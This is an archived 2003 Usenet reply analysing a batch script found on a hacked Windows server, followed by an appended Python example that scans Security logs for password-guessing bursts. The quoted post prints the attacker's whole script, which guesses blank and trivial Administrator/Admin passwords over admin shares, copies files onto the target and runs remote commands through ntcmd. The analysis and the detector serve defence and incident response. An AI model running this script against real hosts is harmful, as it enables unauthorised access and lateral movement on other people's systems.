Re: Someone hacked one of my servers

From: Karl Levinson [x y] mvp (levinson_k@despammed.com)
Date: 02/17/03

    From: "Karl Levinson [x y] mvp" <levinson_k@despammed.com>
    Date: Sun, 16 Feb 2003 19:38:33 -0500


    The first few commands are trying to open a C: drive by logging in with the
    account Admin or Administrator with some very simple passwords. If one of
    these worked, you really really need a better password on all your accounts,
    especially administrator... and a firewall that blocks windows networking
    [netbios over TCP/IP, e.g. TCP and UDP 135 - 139 and 445] BOTH directions,
    not just outbound. The %1 command implies this is a batch file where the
    server name or IP address is supplied when the batch file is called, at the
    command line or by another batch file, e.g. FILENAME.BAT servername

    If you found this file on your computer, this person probably had already
    hacked a way to remotely run commands on your server which may or may not be
    related to this batch file. I'm also guessing they used the TFTP.EXE or
    FTP.EXE commands to download other files such as iserver.bat and ntadmin.exe
    and ntcmd and skill.vxd to your C:\drivers\ folder [which they probably
    created as well]. You can see file copies in the second part of this log.

    I'm guessing ntcmd.exe in the third part is something like CUSRMGR.EXE from
    the Windows Resource Kit. It looks like they attempted to create some
    accounts named Admin or Administrator to allow future access. Note that
    while these accounts may have been created on your computer, these commands
    are probably trying to create the accounts on another computer, maybe on
    your network, maybe not. I think you've got some REAL problems. There's no
    way to know what else they did to this system.

    Frequently this type of hack might come in through IIS web services, so
    check your IIS web logs if you have logging enabled. Otherwise, check your
    firewall logs [if you had a firewall.] Otherwise, you probably don't have
    any other logs that show what happened or who to try to prosecute. If
    you're a business, you might try calling the authorities [police or local
    FBI office in the US, though don't expect anything to happen unless you're a
    business with provable financial loss].

    You're doing the right thing in analyzing the system to try to prevent
    making the same mistake again. I would seriously think about formatting and
    reinstalling everything after your investigation is over.

    Firewalls and antivirus can be had for free [example www.sygate.com free
    firewall and www.grisoft.com for antivirus]. So there's no excuse.

    Here are some things you should do:

    http://securityadmin.info/faq.htm#hacked [looking for more clues to how you
    were hacked]
    http://securityadmin.info/faq.htm#iislogs2
    http://securityadmin.info/faq.htm#iislogs
    http://securityadmin.info/faq.htm#re-secure
    http://securityadmin.info/faq.htm#harden [how to harden your computer
    against this]
    http://securityadmin.info/faq.htm#firewalls

    Hope this helps. Let us know if you find anything interesting or have any
    questions.

    "Joe Kinsella" <joek@tarragonsoftware.com> wrote in message
    news:#szqwCY1CHA.1712@TK2MSFTNGP10...
    > After realizing my system was hacked, I took it offline and started to look
    > at what happened. I found a script called share.bat that reads as listed
    > below: Does anyone have any idea what this might be doing?
    >
    > net use \\%1\C$ "" "/user:Administrator"
    > net use \\%1\C$ "administrator" "/user:Administrator"
    > net use \\%1\C$ "admin" "/user:Administrator"
    > net use \\%1\C$ "" "/user:Admin"
    > net use \\%1\C$ "admin" "/user:Admin"
    > net use \\%1\C$ "administrator" "/user:Admin"
    > md \\%1\C$\Drivers
    > copy iserver.bat \\%1\C$\Drivers
    > copy ntadmin.exe \\%1\C$\Drivers
    > ntcmd \\%1 -u:Administrator -p: < skill.vxd
    > ntcmd \\%1 -u:Administrator -p:administrator < skill.vxd
    > ntcmd \\%1 -u:Administrator -p:admin < skill.vxd
    > ntcmd \\%1 -u:Admin -p: < skill.vxd
    > ntcmd \\%1 -u:Admin -p:admin < skill.vxd
    > ntcmd \\%1 -u:Admin -p:administrator < skill.vxd
    > net use \\%1\C$ /del
    >
    >

    ---
    Outgoing mail is certified Virus Free.
    Checked by AVG anti-virus system (http://www.grisoft.com).
    Version: 6.0.449 / Virus Database: 251 - Release Date: 1/27/2003
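An added example, not part of Karl's reply or Joe's post: every `net use \\%1\C$ <password> /user:<account>` line in the quoted share.bat produces a network logon attempt (logon type 3) on the host named by %1, so the victim-side trace of this script is a burst of failed logons for Administrator and Admin from one source address, followed by a successful network logon if one of the trivial passwords worked. On NT4/2000/XP the failure is Security event 529 and the success is event 540; on Vista and later the equivalents are 4625 and 4624. The script below walks a Security log export for exactly that pattern. The records are constructed for the example, and the key=value field layout is an assumed export format rather than the output of any particular tool.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Security log event IDs: NT4/2000/XP use 529 (failed logon, bad user name or
# password) and 540 (successful network logon); Vista and later use 4625/4624.
FAILED_LOGON = {529, 4625}
SUCCESS_LOGON = {540, 4624}
NETWORK_LOGON_TYPE = 3                        # logon type 3 = network (SMB, net use)
TARGET_ACCOUNTS = {"administrator", "admin"}  # the two accounts share.bat tries

# Constructed sample records (not real logs). The key=value|... layout is an
# assumed export format, not the output of any particular tool.
SAMPLE_LOG = [
    # attacker at 10.0.0.5: three guesses against Administrator, one against
    # Admin, then Admin/"admin" works and a network logon succeeds
    "time=2003-02-14 03:12:01|id=529|type=3|user=Administrator|src=10.0.0.5",
    "time=2003-02-14 03:12:01|id=529|type=3|user=Administrator|src=10.0.0.5",
    "time=2003-02-14 03:12:02|id=529|type=3|user=Administrator|src=10.0.0.5",
    "time=2003-02-14 03:12:02|id=529|type=3|user=Admin|src=10.0.0.5",
    "time=2003-02-14 03:12:03|id=540|type=3|user=Admin|src=10.0.0.5",
    # an admin at 10.0.0.7 mistypes once, then logs on: not a sweep
    "time=2003-02-14 09:30:10|id=529|type=3|user=Administrator|src=10.0.0.7",
    "time=2003-02-14 09:30:25|id=540|type=3|user=Administrator|src=10.0.0.7",
    # an ordinary user: ignored, share.bat never touches this account
    "time=2003-02-14 09:31:00|id=529|type=3|user=jdoe|src=10.0.0.9",
]

def parse_event(line):
    """Turn one key=value|key=value record into a dict (assumed format)."""
    fields = dict(part.split("=", 1) for part in line.split("|"))
    return {
        "time": datetime.strptime(fields["time"], "%Y-%m-%d %H:%M:%S"),
        "event_id": int(fields["id"]),
        "logon_type": int(fields["type"]),
        "user": fields["user"].lower(),
        "source": fields["src"],
    }

def find_admin_share_sweeps(lines, window=timedelta(seconds=60), min_failures=3):
    """One finding per source that rapidly guessed Administrator/Admin passwords
    over the network; compromised_as is set when a success followed the burst."""
    events = sorted((parse_event(l) for l in lines), key=lambda e: e["time"])
    by_source = defaultdict(list)
    for e in events:
        if e["logon_type"] == NETWORK_LOGON_TYPE and e["user"] in TARGET_ACCOUNTS:
            by_source[e["source"]].append(e)

    findings = []
    for src, evs in by_source.items():
        failures = [e for e in evs if e["event_id"] in FAILED_LOGON]
        # a scripted sweep is fast: require min_failures failures inside one window
        burst_start = None
        for i in range(len(failures) - min_failures + 1):
            if failures[i + min_failures - 1]["time"] - failures[i]["time"] <= window:
                burst_start = failures[i]["time"]
                break
        if burst_start is None:
            continue
        # first successful network logon as a targeted account after the burst began
        success = next((e for e in evs
                        if e["event_id"] in SUCCESS_LOGON and e["time"] >= burst_start),
                       None)
        findings.append({
            "source": src,
            "accounts_tried": sorted({e["user"] for e in failures}),
            "failures": len(failures),
            "compromised_as": success["user"] if success else None,
        })
    return findings

if __name__ == "__main__":
    for finding in find_admin_share_sweeps(SAMPLE_LOG):
        print(finding)
```

A source that shows up with `compromised_as` set is a host where one of the six guesses in share.bat worked, which is the case Karl describes: the password needs changing everywhere, not just on that account, and the host should be treated as fully compromised because the script immediately copies files to C$\Drivers and runs commands through ntcmd with the same credentials.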
    